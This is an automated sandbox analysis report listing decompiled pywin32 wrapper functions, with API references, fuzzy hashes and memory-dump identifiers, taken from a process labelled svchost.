                            Function 6DA91F80, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:SetEvent), ref: 6DA91F97
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA91FB3
                            • SetEvent.KERNEL32(?), ref: 6DA91FC4
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetEvent,00000000), ref: 6DA91FD4
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@EventObject_ParseTupleWin_
                            • String ID: O:SetEvent$SetEvent
                            • API String ID: 1430807653-2155133661
                            • Opcode ID: 5cf6a5b119e54584d6f78a4893fcbf2eef8364868a7372994db178b7ed5e86cf
                            • Instruction ID: 93ea9419cab68a52fa7cb50f419917d1c777aaa28765e5684be3b46fc8dc5300
                            • Opcode Fuzzy Hash: 5cf6a5b119e54584d6f78a4893fcbf2eef8364868a7372994db178b7ed5e86cf
                            • Instruction Fuzzy Hash: 97F0907441C2019FDF006B64ED05B363BF8BF84206F484434E854C9111F7798569DA6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91D30, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:PulseEvent), ref: 6DA91D47
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA91D63
                            • PulseEvent.KERNEL32(?), ref: 6DA91D74
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(PulseEvent,00000000), ref: 6DA91D84
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@EventObject_ParsePulseTupleWin_
                            • String ID: O:PulseEvent$PulseEvent
                            • API String ID: 1349761666-1674517046
                            • Opcode ID: 5df1a51d1136daecced7f00442bb79e8460876b91f1440704298c6fa85e35569
                            • Instruction ID: b79a81782579265738448d061d17d0f055bfa02ac01b71cc01b7234bed445075
                            • Opcode Fuzzy Hash: 5df1a51d1136daecced7f00442bb79e8460876b91f1440704298c6fa85e35569
                            • Instruction Fuzzy Hash: 60F0907841C2019FDF00AB54EC05B363BF8BF48206F484434F858C5121F7758569DA5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91F10, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:ResetEvent), ref: 6DA91F27
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA91F43
                            • ResetEvent.KERNEL32(?), ref: 6DA91F54
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ResetEvent,00000000), ref: 6DA91F64
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@EventObject_ParseResetTupleWin_
                            • String ID: O:ResetEvent$ResetEvent
                            • API String ID: 4122562086-1175610888
                            • Opcode ID: 8727c7a174362ba529ab325683bd4cbb063949a65641655cbb11f77cab8243a8
                            • Instruction ID: 1cd1e76aa05a60f31c1f4350c4b3f41306efd972cd9f768740e1519a900bd9ff
                            • Opcode Fuzzy Hash: 8727c7a174362ba529ab325683bd4cbb063949a65641655cbb11f77cab8243a8
                            • Instruction Fuzzy Hash: 1BF0907442C2019FDF005B24EC05B363BF8BF4420AF484434E854C5111FB76956ADA5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA7D60, Relevance: 9.0, APIs: 6, Instructions: 40threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,6DABF124), ref: 6DAA7D76
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA7D95
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA7DA4
                            • GetWindowTextW.USER32 ref: 6DAA7DBA
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAA7DC3
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z.PYWINTYPES38(?,00000000), ref: 6DAA7DCF
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Object_ThreadU_object@@$Arg_FromParseRestoreSaveTextTupleWindow
                            • String ID:
                            • API String ID: 915574332-0
                            • Opcode ID: cc213e19ccbfd771d6782c4041d7633bc1f18b5853507429572c67dbd1fac47d
                            • Instruction ID: 6cd05f38719c896096f66807930a8893a3ce000c6348464020b529809ef76b1f
                            • Opcode Fuzzy Hash: cc213e19ccbfd771d6782c4041d7633bc1f18b5853507429572c67dbd1fac47d
                            • Instruction Fuzzy Hash: E5F08176408301AFDB109B64DD49AAB7BBCEF81601F084A38FA55D2160E735891BCAA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAC488, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            • SystemParametersInfoW.USER32 ref: 6DAAC646
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SystemParametersInfo,00000000), ref: 6DAAC656
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAC963
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAAC978
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Error@@FreeInfoObject_ParametersSystemU_object@@Win_free
                            • String ID: SystemParametersInfo
                            • API String ID: 731016232-3337517057
                            • Opcode ID: 699bfd1313ea23fd9441f247ec9beb14b2cac8d6b196757575ffd811e94c0378
                            • Instruction ID: e9f2ad29c1229b1e6a2758303ad75edbdf10f74c7a785af7bd7217d61b145205
                            • Opcode Fuzzy Hash: 699bfd1313ea23fd9441f247ec9beb14b2cac8d6b196757575ffd811e94c0378
                            • Instruction Fuzzy Hash: 9F01D27860C302DFEA00DF19CC8496A7BF4FB85315F0C8B29F485C2120D731C9AA9B62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAD140, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E6DAAD140(void* __ecx, intOrPtr _a8) {
				struct tagLOGBRUSH _v12;
				char _v16;
				void* _t5;
				struct HBRUSH__* _t10;

				_t5 =  &_v16;
				__imp__PyArg_ParseTuple(_a8, "O:CreateBrushIndirect", _t5);
				if(_t5 != 0) {
					if(E6DAAD0A0(_v16,  &_v12) == 0) {
						goto L1;
					} else {
						_t10 = CreateBrushIndirect( &_v12);
						if(_t10 != 0) {
							return E6DAA5630(__ecx, _t10);
						} else {
							__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CreateBrushIndirect", _t10);
							return _t10;
						}
					}
				} else {
					L1:
					return 0;
				}
			}







                            0x6daad143
                            0x6daad150
                            0x6daad15b
                            0x6daad176
                            0x00000000
                            0x6daad178
                            0x6daad17d
                            0x6daad185
                            0x6daad1a6
                            0x6daad187
                            0x6daad18d
                            0x6daad199
                            0x6daad199
                            0x6daad185
                            0x6daad15d
                            0x6daad15d
                            0x6daad162
                            0x6daad162

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CreateBrushIndirect), ref: 6DAAD150
                            • CreateBrushIndirect.GDI32(?), ref: 6DAAD17D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CreateBrushIndirect,00000000), ref: 6DAAD18D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_BrushCreateError@@IndirectParseTupleU_object@@Win_
                            • String ID: CreateBrushIndirect$O:CreateBrushIndirect
                            • API String ID: 2838503932-3748313448
                            • Opcode ID: 7a270697f392bfd58ccccf98d87087e3d7cd8032b47d6602967557ae027c7231
                            • Instruction ID: bc9bb9c20ebed1d20dc67b1d0032f6f5e5843496021627ee576b3ca5c58f3390
                            • Opcode Fuzzy Hash: 7a270697f392bfd58ccccf98d87087e3d7cd8032b47d6602967557ae027c7231
                            • Instruction Fuzzy Hash: 60F082F5C0C2016FEF006B659D45A3A36ACBA80115FCC4E64FC98C2222F739C669C653
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA6C90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,?), ref: 6DAA6CA6
                            • IsBadReadPtr.KERNEL32(?), ref: 6DAA6CBA
                            • PyErr_SetString.PYTHON38(6E28ED94,The value is not a valid address for reading), ref: 6DAA6CD0
                            • ?PyBuffer_FromMemory@@YAPAU_object@@PAXH@Z.PYWINTYPES38(?), ref: 6DAA6CE6
                            Strings
                            • The value is not a valid address for reading, xrefs: 6DAA6CC9
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Buffer_Err_FromMemory@@ParseReadStringTupleU_object@@
                            • String ID: The value is not a valid address for reading
                            • API String ID: 1788285653-1942545440
                            • Opcode ID: 1c537b5caefcc92a2be95e41965e7aea43a5d7b700e806f698524029174a51c3
                            • Instruction ID: dfb6bc39fce387e6c50686d40aa5a885f65f7d3ab98bcdca4df5ce240bbaf996
                            • Opcode Fuzzy Hash: 1c537b5caefcc92a2be95e41965e7aea43a5d7b700e806f698524029174a51c3
                            • Instruction Fuzzy Hash: 92F05E34408201EFDF016F64DC45A5A7BB5FF05202F488925F8A5C1130E732897BDFA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB1550, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,:WaitMessage), ref: 6DAB1559
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB1569
                            • WaitMessage.USER32 ref: 6DAB1571
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB157A
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_MessageParseRestoreSaveTupleWait
                            • String ID: :WaitMessage
                            • API String ID: 3704248073-3604857323
                            • Opcode ID: 91127b688dac124351d1674606c27174944b5aaae7c7203618345d5de4b62fa9
                            • Instruction ID: 556e974827b645684fab57cf8d490999e3bcf3e8f0406601ebd8692510d852e2
                            • Opcode Fuzzy Hash: 91127b688dac124351d1674606c27174944b5aaae7c7203618345d5de4b62fa9
                            • Instruction Fuzzy Hash: F4E06D3940C301DFCF011F25D88876A3BBAFF86352F08C669EC0A83221D73188578BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA5940, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                            Download Yara Rule
                            C-Code - Quality: 30%
                            			E6DAA5940(int _a4, int _a8, int _a12, long _a16) {
				int _v8;
				intOrPtr _v16;
				int _v20;
				long _v24;
				long _t17;
				void* _t19;
				long _t21;
				void* _t22;
				struct HWND__* _t23;
				void* _t28;
				long _t29;
				void* _t32;
				intOrPtr _t36;

				 *[fs:0x0] = _t36;
				_t23 = _a4;
				_t17 = GetClassLongW(_t23, 0);
				_a4 = 0;
				__imp__PyGILState_Ensure(_t28, _t32, _t22,  *[fs:0x0], E6DABAAFC, 0xffffffff);
				_t29 = _t17;
				_v20 = 0;
				_v24 = _t29;
				_v8 = 0;
				_t19 = E6DAA5750(_t17, _t23, _a8, _a12, _a16,  &_a4);
				_push(_t29);
				if(_t19 != 0) {
					__imp__PyGILState_Release();
					 *[fs:0x0] = _v16;
					return _a4;
				} else {
					__imp__PyGILState_Release();
					_t21 = DefDlgProcW(_t23, _a8, _a12, _a16);
					 *[fs:0x0] = _v16;
					return _t21;
				}
			}
















                            0x6daa5951
                            0x6daa595c
                            0x6daa5964
                            0x6daa596c
                            0x6daa5973
                            0x6daa5979
                            0x6daa597b
                            0x6daa5982
                            0x6daa5988
                            0x6daa599b
                            0x6daa59a3
                            0x6daa59a6
                            0x6daa59d4
                            0x6daa59e3
                            0x6daa59f0
                            0x6daa59a8
                            0x6daa59a8
                            0x6daa59bb
                            0x6daa59c7
                            0x6daa59d1
                            0x6daa59d1

                            APIs
                            • GetClassLongW.USER32(?,00000000), ref: 6DAA5964
                            • PyGILState_Ensure.PYTHON38 ref: 6DAA5973
                              • Part of subcall function 6DAA5750: PyLong_FromLong.PYTHON38(00000000), ref: 6DAA5771
                            • PyGILState_Release.PYTHON38(00000000), ref: 6DAA59A8
                            • DefDlgProcW.USER32(?,?,00000000,?), ref: 6DAA59BB
                            • PyGILState_Release.PYTHON38(00000000), ref: 6DAA59D4
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: State_$LongRelease$ClassEnsureFromLong_Proc
                            • String ID:
                            • API String ID: 2361800756-0
                            • Opcode ID: 5928900da7eadcc6dee602e3db3d82c3240185e1470509467e9cceea01d4a0de
                            • Instruction ID: 5f1cb9296d6a07b60f74814cf17c313177608ff7d39770c6dd25f35b0f24dfbc
                            • Opcode Fuzzy Hash: 5928900da7eadcc6dee602e3db3d82c3240185e1470509467e9cceea01d4a0de
                            • Instruction Fuzzy Hash: 8A11B276504248EFCF00CF88DC84FAABB78FB08361F008626FD0A92240D3359521CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA5880, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                            Download Yara Rule
                            C-Code - Quality: 30%
                            			E6DAA5880(int _a4, int _a8, int _a12, long _a16) {
				int _v8;
				intOrPtr _v16;
				int _v20;
				long _v24;
				long _t17;
				void* _t19;
				long _t21;
				void* _t22;
				struct HWND__* _t23;
				void* _t28;
				long _t29;
				void* _t32;
				intOrPtr _t36;

				 *[fs:0x0] = _t36;
				_t23 = _a4;
				_t17 = GetClassLongW(_t23, 0);
				_a4 = 0;
				__imp__PyGILState_Ensure(_t28, _t32, _t22,  *[fs:0x0], E6DABAAEA, 0xffffffff);
				_t29 = _t17;
				_v20 = 0;
				_v24 = _t29;
				_v8 = 0;
				_t19 = E6DAA5750(_t17, _t23, _a8, _a12, _a16,  &_a4);
				_push(_t29);
				if(_t19 != 0) {
					__imp__PyGILState_Release();
					 *[fs:0x0] = _v16;
					return _a4;
				} else {
					__imp__PyGILState_Release();
					_t21 = DefWindowProcW(_t23, _a8, _a12, _a16);
					 *[fs:0x0] = _v16;
					return _t21;
				}
			}
















                            0x6daa5891
                            0x6daa589c
                            0x6daa58a4
                            0x6daa58ac
                            0x6daa58b3
                            0x6daa58b9
                            0x6daa58bb
                            0x6daa58c2
                            0x6daa58c8
                            0x6daa58db
                            0x6daa58e3
                            0x6daa58e6
                            0x6daa5914
                            0x6daa5923
                            0x6daa5930
                            0x6daa58e8
                            0x6daa58e8
                            0x6daa58fb
                            0x6daa5907
                            0x6daa5911
                            0x6daa5911

                            APIs
                            • GetClassLongW.USER32(?,00000000), ref: 6DAA58A4
                            • PyGILState_Ensure.PYTHON38 ref: 6DAA58B3
                              • Part of subcall function 6DAA5750: PyLong_FromLong.PYTHON38(00000000), ref: 6DAA5771
                            • PyGILState_Release.PYTHON38(00000000), ref: 6DAA58E8
                            • DefWindowProcW.USER32(?,?,00000000,?), ref: 6DAA58FB
                            • PyGILState_Release.PYTHON38(00000000), ref: 6DAA5914
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: State_$LongRelease$ClassEnsureFromLong_ProcWindow
                            • String ID:
                            • API String ID: 972757289-0
                            • Opcode ID: f49aed097b409bc57b972cf9fc295c88699c5c085f81b852f38e383fe84dce06
                            • Instruction ID: 7895e2d352dd890eac3ca22447647d9fb0ee515c7f2413b5d5d1acff3fd26613
                            • Opcode Fuzzy Hash: f49aed097b409bc57b972cf9fc295c88699c5c085f81b852f38e383fe84dce06
                            • Instruction Fuzzy Hash: 5F119476504208FFCF00CF98DC44FAABB78FB49761F048626FD0A96241D7359521CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA92240, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiOi:WaitForMultipleObjectsEx,?,?,?), ref: 6DA9226F
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA9228A
                            • PyErr_Occurred.PYTHON38 ref: 6DA9229A
                            Strings
                            • OiOi:WaitForMultipleObjectsEx, xrefs: 6DA92266
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OiOi:WaitForMultipleObjectsEx
                            • API String ID: 3166690688-2605111738
                            • Opcode ID: cd3f55e89660ef76907483b826db4bf76ee9047a5755670d42dbdc0e661bb0a8
                            • Instruction ID: 0785fb1434d247915e33d896d16c8b1d775131caba2c23fce70a4efdf9ecd224
                            • Opcode Fuzzy Hash: cd3f55e89660ef76907483b826db4bf76ee9047a5755670d42dbdc0e661bb0a8
                            • Instruction Fuzzy Hash: B601F23640C212AFD710AF18DC00AAB7BFCEF84224FC48969FCB885151F734D1588A93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA921C0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:WaitForMultipleObjects,00000000,?), ref: 6DA921EA
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA92205
                            • PyErr_Occurred.PYTHON38 ref: 6DA92215
                            Strings
                            • OiO:WaitForMultipleObjects, xrefs: 6DA921E1
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OiO:WaitForMultipleObjects
                            • API String ID: 3166690688-1585993556
                            • Opcode ID: bf58ee1e99b62e718d23513c58fe1b53fa03993ec9dbab7101f61dcdbd1c20f0
                            • Instruction ID: 705b36eb08254bf904bfde1a0f3978e4e30f011c2fc7e09e18d6da0663f79664
                            • Opcode Fuzzy Hash: bf58ee1e99b62e718d23513c58fe1b53fa03993ec9dbab7101f61dcdbd1c20f0
                            • Instruction Fuzzy Hash: D3F0D17680C2016BC7109E18FC04BEB7BF8EB85624F848539FCA8C5250F7358A58C697
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA7DF0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,6DABF194), ref: 6DAA7E00
                            • InitCommonControlsEx.COMCTL32 ref: 6DAA7E25
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(InitCommonControlsEx,00000000), ref: 6DAA7E35
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_CommonControlsError@@InitParseTupleU_object@@Win_
                            • String ID: InitCommonControlsEx
                            • API String ID: 18624807-2357626986
                            • Opcode ID: 5cb9e425f2570631a371aa18862f98a69c06d1fdf950aff143bb26a759b145aa
                            • Instruction ID: 8b4873169808acf9685c75ceba8d8a806a968b02f2a0fb9f2daa8bdebeb0c49f
                            • Opcode Fuzzy Hash: 5cb9e425f2570631a371aa18862f98a69c06d1fdf950aff143bb26a759b145aa
                            • Instruction Fuzzy Hash: 0CF0D0B890C2059FC700DF15E885B2677F8BB45204F888524EC89C2265E7358A6A9A53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA5590, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_SetString.PYTHON38(6E28ED8C,BLENDFUNCTION must be a tuple of four small ints (0-255)), ref: 6DAA55AC
                            • PyArg_ParseTuple.PYTHON38(?,BBBB:BLENDFUNCTION,?,?,?,?), ref: 6DAA55CF
                            Strings
                            • BBBB:BLENDFUNCTION, xrefs: 6DAA55C9
                            • BLENDFUNCTION must be a tuple of four small ints (0-255), xrefs: 6DAA55A5
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_ParseStringTuple
                            • String ID: BBBB:BLENDFUNCTION$BLENDFUNCTION must be a tuple of four small ints (0-255)
                            • API String ID: 385655187-936056796
                            • Opcode ID: a7926fd74d363d423c08216e1c95781b1f51643b98acac28daa7aec41837c195
                            • Instruction ID: 9341e3077417ce21d4acb370b19655917fea5073e034bdaf22848264bed9003e
                            • Opcode Fuzzy Hash: a7926fd74d363d423c08216e1c95781b1f51643b98acac28daa7aec41837c195
                            • Instruction Fuzzy Hash: C8E03975108205AFCB04CB10CC88E26B7BDBB84208B49C299B40A86122E732E95BDB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA55E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_SetString.PYTHON38(6E28ED8C,SIZE must be a tuple of 2 ints (x,y)), ref: 6DAA55FC
                            • PyArg_ParseTuple.PYTHON38(?,ll;SIZE must be a tuple of 2 ints (x,y),?,?), ref: 6DAA5617
                            Strings
                            • ll;SIZE must be a tuple of 2 ints (x,y), xrefs: 6DAA5611
                            • SIZE must be a tuple of 2 ints (x,y), xrefs: 6DAA55F5
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
